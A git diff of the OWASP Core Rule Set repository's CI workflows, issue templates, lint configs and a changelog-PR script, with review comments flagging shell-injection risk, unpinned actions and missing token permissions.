diff --git a/.changes-pending.md b/.changes-pending.md new file mode 100644 index 0000000000..e69de29bb2 diff --git a/.editorconfig b/.editorconfig new file mode 100644 index 0000000000..037ae5e380 --- /dev/null +++ b/.editorconfig @@ -0,0 +1,24 @@ +# EditorConfig is awesome: https://EditorConfig.org + +# top-most EditorConfig file +root = true + +# Unix-style newlines with a newline ending every file +[*] +end_of_line = lf +insert_final_newline = true +trim_trailing_whitespace = true + +# Matches multiple files with brace expansion notation +# Set default charset +[*.py] +charset = utf-8 +# 4 space indentation +indent_style = space +indent_size = 4 + +# Indentation override for all JS under lib directory +[tests/regression/tests/**/*.yaml] +indent_style = space +indent_size = 2 + diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml new file mode 100644 index 0000000000..c0386a3ecd --- /dev/null +++ b/.github/FUNDING.yml @@ -0,0 +1 @@ +custom: https://coreruleset.org/donate diff --git a/.github/ISSUE_TEMPLATE/01_false-positive.md b/.github/ISSUE_TEMPLATE/01_false-positive.md index eeb0b7a3ee..8dfb24b590 100644 --- a/.github/ISSUE_TEMPLATE/01_false-positive.md +++ b/.github/ISSUE_TEMPLATE/01_false-positive.md 
@@ -1,31 +1,68 @@ --- name: 'False positive' -about: Report a false positive (incorrect blocking) +about: Report a false positive (blocking of benign traffic) title: '' -labels: 'False Positive' +labels: ':heavy_plus_sign: False Positive' assignees: '' --- + + ### Description - - - + + +### How to reproduce the misbehavior (-> curl call) + + + +### Logs + + - +If you cannot submit neither curl call nor log files nor a payload to reproduce +the behavior, there is litterally nothing we can do for you. Please help us to +get access to the information we need to help you. +--> ### Your Environment - - + -* CRS version (e.g., v3.2.0): -* Paranoia level setting: -* ModSecurity version (e.g., 2.9.3): -* Web Server and version (e.g., apache 2.4.41): +* CRS version (e.g., v3.3.4): +* Paranoia level setting (e.g. PL1) : +* ModSecurity version (e.g., 2.9.6): +* Web Server and version or cloud provider / CDN (e.g., Apache httpd 2.4.54): * Operating System and version: ### Confirmation diff --git a/.github/ISSUE_TEMPLATE/02_false-negative.md b/.github/ISSUE_TEMPLATE/02_false-negative.md index 75b0e3544f..76a9b4a907 100644 --- a/.github/ISSUE_TEMPLATE/02_false-negative.md +++ b/.github/ISSUE_TEMPLATE/02_false-negative.md 
@@ -1,30 +1,68 @@ --- name: 'False negative' -about: Report a false negative (incorrect bypass) +about: Report a false negative (ignoring of malicious traffic) title: '' -labels: 'False Negative - Evasion' +labels: ':heavy_minus_sign: False Negative - Evasion' assignees: '' --- + + ### Description - - - - - - - + + +### How to reproduce the misbehavior (-> curl call) + + + +### Logs + + ### Your Environment - - + -* CRS version (e.g., v3.2.0): -* Paranoia level setting: -* ModSecurity version (e.g., 2.9.3): -* Web Server and version (e.g., apache 2.4.41): +* CRS version (e.g., v3.3.4): +* Paranoia level setting (e.g. PL1) : +* ModSecurity version (e.g., 2.9.6): +* Web Server and version or cloud provider / CDN (e.g., Apache httpd 2.4.54): * Operating System and version: ### Confirmation diff --git a/.github/ISSUE_TEMPLATE/03_bug-report.md b/.github/ISSUE_TEMPLATE/03_bug-report.md index bc130f67f7..689b2b2a65 100644 --- a/.github/ISSUE_TEMPLATE/03_bug-report.md +++ b/.github/ISSUE_TEMPLATE/03_bug-report.md @@ -2,7 +2,7 @@ name: '🐞 Bug report' about: Create a report to help us improve title: '' -labels: 'Bug' +labels: ':bug: bug' assignees: '' --- diff --git a/.github/ISSUE_TEMPLATE/04_feature.md b/.github/ISSUE_TEMPLATE/04_feature.md index b2e82b611d..04939383a0 100644 --- a/.github/ISSUE_TEMPLATE/04_feature.md +++ b/.github/ISSUE_TEMPLATE/04_feature.md @@ -2,10 +2,16 @@ name: '🚀 Feature request' about: Suggest an idea for this project title: '' -labels: 'Feature Request' +labels: ':+1: Feature Request' assignees: '' --- + ### Motivation diff --git a/.github/ISSUE_TEMPLATE/config.yml b/.github/ISSUE_TEMPLATE/config.yml index 4c1d7af743..3b47fbf3d9 100644 --- a/.github/ISSUE_TEMPLATE/config.yml +++ b/.github/ISSUE_TEMPLATE/config.yml 
@@ -4,5 +4,5 @@ contact_links: url: https://security.stackexchange.com/questions/tagged/owasp-crs about: For help and support please go here. - name: OWASP Core Rule Set mailing list - url: https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project + url: https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project about: Ask general usage questions and participate in discussions on the CRS. diff --git a/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md b/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md new file mode 100644 index 0000000000..e71cd07cd3 --- /dev/null +++ b/.github/PULL_REQUEST_TEMPLATE/pull_request_template.md 
@@ -0,0 +1,30 @@ +## Proposed changes + +Describe the big picture of your changes here to communicate to the maintainers why we should accept this pull request. If it fixes a bug or resolves a feature request, be sure to link to that issue. + + + +## PR Checklist + + + +- [ ] I have read the [CONTRIBUTING](https://github.com/coreruleset/coreruleset/blob/v4.0/dev/CONTRIBUTING.md) doc +- [ ] I have added positive tests proving my fix/feature works as intended. +- [ ] I have added negative tests that prove my fix/feature considers common cases that might end in false positives +- [ ] In case you changed a regular expression, you are not adding a ReDOS for pcre. You can check this using [regexploit](https://github.com/doyensec/regexploit) +- [ ] My test use the `comment` field to write the expected behavior +- [ ] I have added documentation for the rule or change (when appropriate) + +## Further comments + + + +## For the reviewer + + + +- [ ] Positive and negative tests were added +- [ ] Tests cover the intended fix/feature properly +- [ ] No usage of dangerous constructs like `ctl:requestBodyAccess=Off` were used in the rule +- [ ] In case a regular expression was changed, [there is no ReDOS](https://github.com/coreruleset/coreruleset/wiki/Testing-for-Regular-Expresion-DoS) +- [ ] Documentation is clear for the rule/change diff --git a/.github/create-changelog-prs.py b/.github/create-changelog-prs.py new file mode 100755 index 0000000000..401dcfee24 --- /dev/null +++ b/.github/create-changelog-prs.py 
@@ -0,0 +1,184 @@ +#! /usr/bin/env python + +import subprocess +import json +import datetime +import sys +import os +import re + +DEVELOPERS = dict() + +def get_pr(repository: str, number: int) -> dict: + command = f"""gh pr view \ + --repo "{repository}" \ + "{number}" \ + --json mergeCommit,mergedBy,title,author,baseRefName,number + """ + proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + pr_json, errors = proc.communicate() + if proc.returncode != 0: + print(errors) + exit(1) + return json.loads(pr_json) + +def get_prs(repository: str, day: datetime.date) -> list: + print(f"Fetching PRs for {day}") + command = f"""gh search prs \ + --repo "{repository}" \ + --merged-at "{day}" \ + --json number \ + -- \ + -label:changelog-pr # ignore changelog prs + """ + proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + prs_json, errors = proc.communicate() + if proc.returncode != 0: + print(errors) + exit(1) + prs = list() + for result in json.loads(prs_json): + prs.append(get_pr(repository, result["number"])) + + return prs + +def parse_prs(prs: list) -> dict: + pr_map = dict() + for pr in prs: + merged_by = pr["mergedBy"]["login"] + if merged_by not in pr_map: + pr_list = list() + pr_map[merged_by] = pr_list + else: + pr_list = pr_map[merged_by] + pr_list.append(pr) + return pr_map + + +def create_prs(repository: str, merged_by_prs_map: dict, day: datetime.date): + for author in merged_by_prs_map.keys(): + create_pr(repository, author, merged_by_prs_map[author], day) + +def create_pr(repository: str, merged_by: str, prs: list, day: datetime.date): + if len(prs) == 0: + return + print(f"Creating changelog PR for @{merged_by}") + + sample_pr = prs[0] + base_branch = sample_pr["baseRefName"] + pr_branch_name = create_pr_branch(day, merged_by, base_branch) + pr_body, changelog_lines = generate_content(prs, merged_by) + create_commit(changelog_lines) + push_pr_branch(pr_branch_name) + + 
command = f"""gh pr create \ + --repo "{repository}" \ + --assignee "{merged_by}" \ + --base "{base_branch}" \ + --label "changelog-pr" \ + --title "chore: changelog updates for {day}, merged by @{merged_by}" \ + --body-file - + """ + + proc = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + outs, errors = proc.communicate(input=pr_body.encode()) + if proc.returncode != 0: + print(errors) + exit(1) + print(f"Created PR: {outs.decode()}") + +def create_commit(changelog_lines: str): + with open('.changes-pending.md', 'a') as changelog: + changelog.write(changelog_lines) + + command = "git commit .changes-pending.md -m 'Add pending changelog entries'" + proc = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE) + _, errors = proc.communicate() + if proc.returncode != 0: + print(errors) + exit(1) + +def generate_content(prs: list, merged_by: str) -> (str, str): + changelog_lines = "" + pr_body = f"This PR was auto-generated to update the changelog with the following entries, merged by @{merged_by}:\n```\n" + pr_links = "" + for pr in prs: + pr_number = pr["number"] + pr_title = pr["title"] + pr_author = get_pr_author_name(pr["author"]["login"]) + new_line = f" * {pr_title} ({pr_author}) [#{pr_number}]\n" + pr_body += new_line + pr_links += f"- #{pr_number}\n" + + changelog_lines += new_line + pr_body += "```\n\n" + pr_links + + return pr_body, changelog_lines + +def get_pr_author_name(login: str) -> str: + if len(DEVELOPERS) == 0: + parse_contributors() + + return DEVELOPERS[login] if login in DEVELOPERS else f"@{login}" + +def parse_contributors(): + regex = re.compile(r'^\s*?-\s*?\[([^]]+)\]\s*?\(http.*/([^/]+)\s*?\)') + with open('CONTRIBUTORS.md', 'rt') as handle: + line = handle.readline() + while not ('##' in line and 'Contributors' in line): + match = regex.match(line) + if match: + DEVELOPERS[match.group(2)] = match.group(1) + line = handle.readline() + +def create_pr_branch(day: 
datetime.date, author: str, base_branch: str) -> str: + branch_name = f"changelog-updates-for-{day}-{author} {base_branch}" + command = f"git checkout -b {branch_name}" + proc = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE) + _, errors = proc.communicate() + if proc.returncode != 0: + print(errors) + exit(1) + + return branch_name + +def push_pr_branch(branch_name: str): + command = f"git push -u origin {branch_name}" + proc = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE) + _, errors = proc.communicate() + if proc.returncode != 0: + print(errors) + exit(1) + +def run(source_repository: str, target_repository: str, today: datetime.date): + day = today - datetime.timedelta(days=1) + prs = get_prs(source_repository, day) + prs_length = len(prs) + print(f"Found {prs_length} PRs") + if prs_length == 0: + return + + merged_by_prs_map = parse_prs(prs) + create_prs(target_repository, merged_by_prs_map, day) + +if __name__ == "__main__": + # disable pager + os.environ["GH_PAGER"] = '' + # set variables for Git + os.environ["GIT_AUTHOR_NAME"] = "changelog-pr-bot" + os.environ["GIT_AUTHOR_EMAIL"] = "dummy@coreruleset.org" + os.environ["GIT_COMMITTER_NAME"] = "changelog-pr-bot" + os.environ["GIT_COMMITTER_EMAIL"] = "dummy@coreruleset.org" + + source_repository = 'coreruleset/coreruleset' + target_repository = source_repository + # the cron schedule for the workflow uses UTC + today = datetime.datetime.now(datetime.timezone.utc).date() + + if len(sys.argv) > 1: + source_repository = sys.argv[1] + if len(sys.argv) > 2: + target_repository = sys.argv[2] + if len(sys.argv) > 3: + today = datetime.date.fromisoformat(sys.argv[3]) + run(source_repository, target_repository, today) diff --git a/.github/workflows/check-pr-dependencies.yaml b/.github/workflows/check-pr-dependencies.yaml new file mode 100644 index 0000000000..b93b11ce7e --- /dev/null +++ b/.github/workflows/check-pr-dependencies.yaml 
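Review bot: `create_pr_branch` embeds a space in the returned name, `f"changelog-updates-for-{day}-{author} {base_branch}"`, so `git checkout -b` happens to read `base_branch` as the start-point, but the same string is then handed to `push_pr_branch`, where `git push -u origin {branch_name}` splits it into two refspecs and tries to push `base_branch` as well. Every command in this file is also built by f-string interpolation under `shell=True`; `baseRefName` and `mergedBy.login` come back from the GitHub API, and while GitHub constrains both, an argument list removes the shell from the path entirely and fixes the space problem in one go. The two helpers below are rewritten that way; the remaining `Popen(..., shell=True)` call sites (`get_pr`, `get_prs`, `create_pr`, `create_commit`) would benefit from the same treatment.
```python
def create_pr_branch(day: datetime.date, author: str, base_branch: str) -> str:
    # Branch name must not contain whitespace; base_branch is passed to git
    # as the explicit start-point instead of being glued into the name.
    branch_name = f"changelog-updates-for-{day}-{author}"
    proc = subprocess.run(["git", "checkout", "-b", branch_name, base_branch],
                          stderr=subprocess.PIPE)
    if proc.returncode != 0:
        print(proc.stderr)
        exit(1)

    return branch_name

def push_pr_branch(branch_name: str):
    # Single refspec: only the changelog branch is pushed.
    proc = subprocess.run(["git", "push", "-u", "origin", branch_name],
                          stderr=subprocess.PIPE)
    if proc.returncode != 0:
        print(proc.stderr)
        exit(1)
```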
@@ -0,0 +1,19 @@ +name: Check PR dependencies +on: + pull_request_target: + types: + - opened + - reopened + - edited + - synchronize + +jobs: + check_dependencies: + runs-on: ubuntu-latest + name: Check Dependencies + permissions: + pull-requests: read # Reason: To check PRs for dependencies. + steps: + - uses: gregsdennis/dependencies-action@main + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/check-pr-title.yaml b/.github/workflows/check-pr-title.yaml new file mode 100644 index 0000000000..f5a6a4823c --- /dev/null +++ b/.github/workflows/check-pr-title.yaml @@ -0,0 +1,16 @@ +name: Check PR title +on: + pull_request_target: + types: + - opened + - reopened + - edited + - synchronize + +jobs: + check-pr-title: + runs-on: ubuntu-latest + steps: + - uses: aslafy-z/conventional-pr-title-action@v3 + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/lint.yaml b/.github/workflows/lint.yaml index 161deb47a8..da99d3beda 100644 --- a/.github/workflows/lint.yaml +++ b/.github/workflows/lint.yaml @@ -1,4 +1,3 @@ ---- name: Lint on: [push, pull_request] @@ -6,17 +5,15 @@ on: [push, pull_request] jobs: check-syntax: runs-on: ubuntu-latest - strategy: - fail-fast: true - # check why is failing and change afterwards steps: - name: Checkout repo - uses: actions/checkout@v2 + uses: actions/checkout@v4 - name: Lint Yaml - uses: ibiqlik/action-yamllint@v1 + uses: ibiqlik/action-yamllint@v3 with: - file_or_dir: tests/regression/tests/**/*.yaml + format: github + file_or_dir: tests/regression/tests config_file: .yamllint.yml - name: Linelint 
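Review bot: `uses: gregsdennis/dependencies-action@main` pins a third-party action to a mutable branch, and this job runs on `pull_request_target` with `secrets.GITHUB_TOKEN`, so whoever can push to that branch can run arbitrary code with the token on every PR event. The `permissions: pull-requests: read` block is the right mitigation, but the action ref should still be a full commit SHA that you have reviewed, with the version noted in a trailing comment, e.g. `- uses: gregsdennis/dependencies-action@<full-commit-sha> # <release tag>`. Dependabot or Renovate can then bump the SHA under review rather than the branch moving silently.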
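Review bot: The `check-pr-title` job in check-pr-title.yaml runs on `pull_request_target` but declares no `permissions:` block, so `secrets.GITHUB_TOKEN` carries whatever the repository's default token permissions are, which can include write scopes, while executing a third-party action pinned to the mutable tag `aslafy-z/conventional-pr-title-action@v3`. Add an explicit minimal block on the job, `permissions:` followed by only the scope the action documents as required (reading the PR title needs no more than `pull-requests: read`), and pin the action to a full commit SHA as the sibling workflow should also do. This is the same mitigation the check-pr-dependencies job already applies to its token.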
@@ -24,15 +21,45 @@ jobs: id: linelint - name: Set up Python 3 - uses: actions/setup-python@v1 + uses: actions/setup-python@v4 with: - python-version: 3.6 + python-version: 3.7 - name: "Check CRS syntax" run: | - python -V pip install --upgrade setuptools - pip install -r tests/integration/requirements.txt - git clone https://github.com/CRS-support/secrules_parsing - pip install -r secrules_parsing/requirements.txt - python secrules_parsing/secrules_parser.py -c -f rules/*.conf + pip install secrules-parsing + secrules-parser -c --output-type github -f rules/*.conf + + - name: "Check CRS formatting" + run: | + pip install --upgrade setuptools + pip install -r ./util/crs-rules-check/requirements.txt + ./util/crs-rules-check/rules-check.py --output=github -r crs-setup.conf.example -r rules/*.conf -t util/APPROVED_TAGS + + - name: "Find rules without test" + run: | + pip install --upgrade setuptools + pip install -r ./util/find-rules-without-test/requirements.txt + ./util/find-rules-without-test/find-rules-without-test.py --output=github . + + - name: "Install crs-toolchain" + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + gh release download -R coreruleset/crs-toolchain -p '*_linux_amd64.tar.gz' + ls crs-toolchain* + tar xzf crs-toolchain*_linux_amd64.tar.gz + rm crs-toolchain*_linux_amd64.tar.gz + + - name: "Check that all assembly files are properly formatted" + run: | + ./crs-toolchain regex format -aco github + + - name: "Check that all rules are up to date" + run: | + ./crs-toolchain regex compare -ao github + + - name: "Check that all tests are properly numbered" + run: | + ./crs-toolchain util renumber-tests -cao github diff --git a/.github/workflows/nightly.yml b/.github/workflows/nightly.yml new file mode 100644 index 0000000000..b01213785c --- /dev/null +++ b/.github/workflows/nightly.yml 
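Review bot: The "Install crs-toolchain" step downloads whatever the current latest release of `coreruleset/crs-toolchain` happens to be (`gh release download -R coreruleset/crs-toolchain -p '*_linux_amd64.tar.gz'`) with no version pin and no checksum verification, and then runs that binary against the repository on every push and PR. The sibling test.yml pins `GO_FTW_VERSION`, so the same pattern applies here: add an `env: CRS_TOOLCHAIN_VERSION: '<tag>'` and download `"v${CRS_TOOLCHAIN_VERSION}"` explicitly, then verify the archive against the release's checksum file if the project publishes one (I cannot confirm from here that it does). `pip install secrules-parsing` is likewise unpinned; `pip install 'secrules-parsing==<version>'` keeps the lint results reproducible and keeps a compromised or broken upstream release from silently changing what the CI accepts.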
@@ -0,0 +1,61 @@ + +name: Nightly Release +on: + schedule: + - cron: '0 2 * * *' # run at 2 AM UTC + +jobs: + nightly: + name: Nightly Release + runs-on: ubuntu-latest + steps: + - name: "Checkout repo" + uses: actions/checkout@v4 + + - name: Delete previous nightly release + run: | + gh release delete --repo coreruleset/coreruleset --cleanup-tag --yes nightly + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + - name: Create nightly release + run: | + notes=$(cat <<"EOF" + Nightly releases are snapshots of the development activity on the Core Rule Set project that may include new features and bug fixes scheduled for upcoming releases. These releases are made available to make it easier for users to test their existing configurations against the Core Rule Set code base for potential issues or to experiment with new features, with a chance to provide feedback on ways to improve the changes before being released. + + As these releases are snapshots of the latest code, you may encounter an issue compared to the latest stable release so users are encouraged to run nightly releases in a non production environment. If you encounter an issue, please check our issue tracker to see if the issue has already been reported; if a report hasn't been made, please report it so we can review the issue and make any needed fixes. + EOF + ) + + gh release create \ + --repo coreruleset/coreruleset \ + --latest \ + --prerelease \ + --draft=false \ + --title "Latest Nightly" \ + --notes "${notes}" \ + nightly + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + - name: Publish draft if necessary + run: | + echo "A race condition in the GH API can cause a release published for a previously existing tag to be published as draft." + echo "Wait for 30 seconds for the API to catch up to the actual state, then check that the release has been properly published." + echo "If the release is still a draft, publish it." 
+ sleep 30 + if gh release list --repo coreruleset/coreruleset --exclude-drafts | grep --quiet nightly; then + echo "Nightly release was created properly" + exit 0 + fi + + echo "Nightly release was created as draft. Publishing now." + + gh release edit \ + --repo coreruleset/coreruleset \ + --latest \ + --prerelease \ + --draft=false \ + nightly + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/stale.yml b/.github/workflows/stale.yml index f3e129c8bc..3318a744aa 100644 --- a/.github/workflows/stale.yml +++ b/.github/workflows/stale.yml @@ -10,10 +10,11 @@ jobs: runs-on: ubuntu-latest steps: - - uses: actions/stale@v1 + - uses: actions/stale@v3 with: repo-token: ${{ secrets.GITHUB_TOKEN }} - stale-issue-message: 'This issue has been open 120 days with no activity. Remove the stale label or comment, or this will be closed in 14 days' + stale-issue-message: 'This issue has been open 30 days waiting for feedback. Remove the stale label or comment, or this will be closed in 14 days' stale-issue-label: 'Stale issue' - days-before-stale: 120 + days-before-stale: 30 days-before-close: 14 + only-issue-labels: ':hourglass_flowing_sand: awaiting feedback' diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 1f2019b80b..eb8876b5b8 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -1,4 +1,3 @@ ---- name: Regression Tests on: 
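Review bot: Both `gh release create` and the fallback `gh release edit` pass `--latest` together with `--prerelease`, which explicitly marks the nightly snapshot as the repository's "Latest" release; consumers that resolve `/releases/latest` or run `gh release download` without a tag will then receive unreviewed development code instead of the stable version. Drop `--latest` from both invocations so GitHub's default (prerelease excluded from latest) applies, unless serving nightlies as latest is an intentional decision, in which case it deserves a comment in the workflow. The job also declares no `permissions:` block although it deletes tags and publishes releases; add `permissions:` with `contents: write` on the job so the token carries only that scope. Note that there is a window between `gh release delete --cleanup-tag` and the subsequent create in which no nightly exists at all, and a failed create leaves it that way.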
@@ -11,64 +10,50 @@ on: paths: - 'rules/**' - 'tests/**' + - 'util/**' - '.github/**' jobs: - # "modsec2-apache", "modsec3-apache", "modsec3-nginx" regression: runs-on: ubuntu-latest strategy: - # change to true - fail-fast: false matrix: modsec_version: [modsec2-apache] - tests: [REQUEST-911-METHOD-ENFORCEMENT, - REQUEST-913-SCANNER-DETECTION, - REQUEST-920-PROTOCOL-ENFORCEMENT, - REQUEST-921-PROTOCOL-ATTACK, - REQUEST-930-APPLICATION-ATTACK-LFI, - REQUEST-931-APPLICATION-ATTACK-RFI, - REQUEST-932-APPLICATION-ATTACK-RCE, - REQUEST-933-APPLICATION-ATTACK-PHP, - REQUEST-934-APPLICATION-ATTACK-NODEJS, - REQUEST-941-APPLICATION-ATTACK-XSS, - REQUEST-942-APPLICATION-ATTACK-SQLI, - REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION, - REQUEST-944-APPLICATION-ATTACK-JAVA] - # Will include soon for modsec3-nginx - steps: - - name: Checkout repo - uses: actions/checkout@v2 + - name: "Checkout repo" + uses: actions/checkout@v4 - - name: Set up Python 2 - uses: actions/setup-python@v1 - with: - python-version: 2.7 + - name: "Install dependencies" + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + GO_FTW_VERSION: '0.6.4' + run: | + gh release download -R coreruleset/go-ftw v${GO_FTW_VERSION} -p "ftw_${GO_FTW_VERSION}_linux_amd64.tar.gz" -O - | tar -xzvf - ftw - - name: "Run tests for ${{ matrix.modsec_version }}`" + - name: "Run tests for ${{ matrix.modsec_version }}" + run: | + mkdir -p tests/logs/${{ matrix.modsec_version }}/{nginx,apache2} + docker-compose -f ./tests/docker-compose.yml up -d "${{ matrix.modsec_version }}" + docker-compose -f ./tests/docker-compose.yml logs + [ $(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}') = 'true' ] + ./ftw check -d tests/regression/tests + ./ftw run -d tests/regression/tests --show-failures-only env: - CONFIG: ${{ matrix.modsec_version }} + FTW_LOGFILE: './tests/logs/${{ matrix.modsec_version }}/error.log' + + - name: "Change permissions if failed" + if: failure() run: | - python -V - mkdir -p logs/"${CONFIG}" - 
docker-compose -f ./tests/docker-compose.yml up -d "${CONFIG}" - pip install --upgrade setuptools - pip install -r tests/regression/requirements.txt - # Use mounted volume path - if [[ "${CONFIG}" == *"nginx" ]]; then - LOGDIR="/var/log/nginx" - else - LOGDIR="/var/log/apache2" - fi - sed -ie "s:${LOGDIR}:${GITHUB_WORKSPACE}/logs/${CONFIG}:g" tests/regression/config.ini - py.test -vs tests/regression/CRS_Tests.py \ - --config="${CONFIG}" \ - --ruledir=./tests/regression/tests/${{ matrix.tests }} + # we want to get the audit log, so change permissions (file is only for root on docker) + sudo chmod 644 tests/logs/${{ matrix.modsec_version }}/modsec_audit.log + + - uses: actions/upload-artifact@v3 + if: failure() + with: + name: waf-logs + path: tests/logs/${{ matrix.modsec_version }} - name: Clean docker-compose - env: - CONFIG: modsec2-apache run: | - docker-compose -f ./tests/docker-compose.yml stop "${CONFIG}" + docker-compose -f ./tests/docker-compose.yml stop "${{ matrix.modsec_version }}" docker-compose -f ./tests/docker-compose.yml down diff --git a/.github/workflows/update-changelog.yaml b/.github/workflows/update-changelog.yaml new file mode 100644 index 0000000000..6a5c813d64 --- /dev/null +++ b/.github/workflows/update-changelog.yaml @@ -0,0 +1,23 @@ +name: Create changelog PRs +on: + schedule: + - cron: '0 2 * * *' # run at 2 AM UTC + +jobs: + create-changelog-prs: + name: + runs-on: ubuntu-latest + steps: + - name: "Checkout repo" + uses: actions/checkout@v4 + + - name: Set up Python 3 + uses: actions/setup-python@v4 + with: + python-version: 3.12 + + - name: "Run script" + run: ".github/create-changelog-prs.py" + env: + # Required for the use of the gh CLI in the script + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.gitignore b/.gitignore index a8f9bac6b8..dabe18fda5 100644 --- a/.gitignore +++ b/.gitignore 
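Review bot: The "Install dependencies" step pins `GO_FTW_VERSION` (good) but pipes the downloaded tarball straight into `tar -xzvf - ftw` without checking a checksum, so the pinned tag is the only integrity guarantee for a binary that then runs every regression test; if the go-ftw release publishes a checksum file, download to disk and verify it before extracting. In the "Run tests" step, `[ $(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}') = 'true' ]` leaves the command substitution unquoted, so an empty result (container missing, inspect failed) produces a `[ = true ]` syntax error rather than a clean false; write it as `[ "$(docker inspect "${{ matrix.modsec_version }}" --format='{{.State.Running}}')" = 'true' ]`. The `sudo chmod 644` on `modsec_audit.log` before upload is fine for test traffic, but keep in mind the artifact is downloadable by anyone with read access to the run.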
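Review bot: The `create-changelog-prs` job in update-changelog.yaml runs a script that pushes branches and opens pull requests with `secrets.GITHUB_TOKEN`, yet the workflow declares no `permissions:` block, so it depends on the repository default instead of stating the `contents: write` and `pull-requests: write` it actually needs; add those two scopes explicitly under `permissions:` on the job. Be aware that pull requests created with the default `GITHUB_TOKEN` do not trigger `pull_request` workflows, so the generated changelog PRs will not receive the lint or regression runs defined elsewhere in this change unless a separate app or PAT is used, which is worth documenting next to the token comment. The job's `name:` key is also left empty and should either be given a value or removed.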
@@ -10,6 +10,10 @@ rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf # util/upgrade.py geoip util/geo-location/GeoIP.dat +# PHP functions frequency list generated and updated by running +# util/php-dictionary-gen.sh +util/php-dictionary-gen/frequencylist.txt + # Unit test caches .cache @@ -19,3 +23,12 @@ __pycache__/ *$py.class .idea/ + +# Ignore test logs +tests/logs/ + +# ignore .env in tests for docker-compose variables +tests/.env + +# Ignore Go-FTW configuration file +.ftw.yaml diff --git a/.gitmodules b/.gitmodules index 5921187608..c68ffddc5b 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,4 +1,4 @@ [submodule "docs/OWASP-CRS-Documentation"] path = docs/OWASP-CRS-Documentation - url = https://github.com/SpiderLabs/OWASP-CRS-Documentation - branch = master + url = https://github.com/coreruleset/documentation.git + branch = main diff --git a/.linelint.yml b/.linelint.yml index 12e7c88e61..e2111917a1 100644 --- a/.linelint.yml +++ b/.linelint.yml @@ -10,3 +10,4 @@ rules: # will be ignored only by this rule ignore: - .pytest_cache/* + - .changes-pending.md diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml new file mode 100644 index 0000000000..01e1a0fb24 --- /dev/null +++ b/.pre-commit-config.yaml @@ -0,0 +1,13 @@ +--- +# Update the rev variable with the release version that you want, from the yamllint repo +# You can pass your custom .yamllint with args attribute. +repos: +- repo: https://github.com/pre-commit/pre-commit-hooks + rev: v4.4.0 + hooks: + - id: check-yaml + args: [--allow-multiple-documents] + - id: end-of-file-fixer + - id: trailing-whitespace + exclude: '^regex-assembly/' + args: [--markdown-linebreak-ext=md] diff --git a/.travis.yml b/.travis.yml deleted file mode 100644 index 96765998f3..0000000000 --- a/.travis.yml +++ /dev/null 
@@ -1,31 +0,0 @@ -os: linux -language: python -python: - - 2.7 - -# no more required in travis -#sudo: required - -services: - - docker - -jobs: - include: - script: - - | - if [[ "$TRAVIS_PULL_REQUEST" != "false" ]]; then - docker run -ti --name crs-test --entrypoint /docker-entrypoint.sh -e REPO=$TRAVIS_PULL_REQUEST_SLUG -e BRANCH=$TRAVIS_PULL_REQUEST_BRANCH themiddle/crs-test - else - docker run -ti --name crs-test --entrypoint /docker-entrypoint.sh -e REPO=$TRAVIS_REPO_SLUG -e BRANCH=$TRAVIS_BRANCH themiddle/crs-test - fi - -# safelist -branches: - only: - - v3.1/dev - - v3.2/dev - - v3.3/dev - - fix-travis - -#notifications: -# irc: "chat.freenode.net#modsecurity" diff --git a/.yamllint.yml b/.yamllint.yml index 6e15cc1159..9064fad92a 100644 --- a/.yamllint.yml +++ b/.yamllint.yml @@ -11,8 +11,12 @@ rules: tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml + tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml + tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml # don't bother me with this rule indentation: disable - comments: {require-starting-space: false} + comments: + require-starting-space: true # default + min-spaces-from-content: 1 diff --git a/CHANGES b/CHANGES.md similarity index 57% rename from CHANGES rename to CHANGES.md index 390baf3900..ad836d4006 100644 --- a/CHANGES +++ b/CHANGES.md 
